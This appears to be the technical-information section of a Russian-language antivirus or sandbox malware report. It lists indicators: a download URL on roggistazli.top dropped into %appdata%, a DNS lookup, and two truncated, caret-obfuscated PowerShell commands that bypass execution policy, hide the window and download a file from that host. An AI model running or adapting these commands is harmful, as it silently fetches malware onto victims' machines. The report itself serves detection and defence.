Техническая информация
- http://roggistazli.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWERShE^Ll.Ex^E^ ^-^E^x^EcUtI^on^PoliC^y^ by^p^asS -NOPROFile -WI^nDoWST^Yle ^hid^d^En (N^e^W^-OBJeCT sySte^M.nE^t^.^w^ebC^L^iEn^T^)^.D^ow^n^LO^aD^F^IL^e('http://roggistazl...
- DNS ASK ro###stazli.top
- '<SYSTEM32>\cmd.exe' /C "pOWERShE^Ll.Ex^E^ ^-^E^x^EcUtI^on^PoliC^y^ by^p^asS -NOPROFile -WI^nDoWST^Yle ^hid^d^En (N^e^W^-OBJeCT sySte^M.nE^t^.^w^ebC^L^iEn^T^)^.D^ow^n^LO^aD^F^IL^e('http://roggistazl...' (со скрытым окном)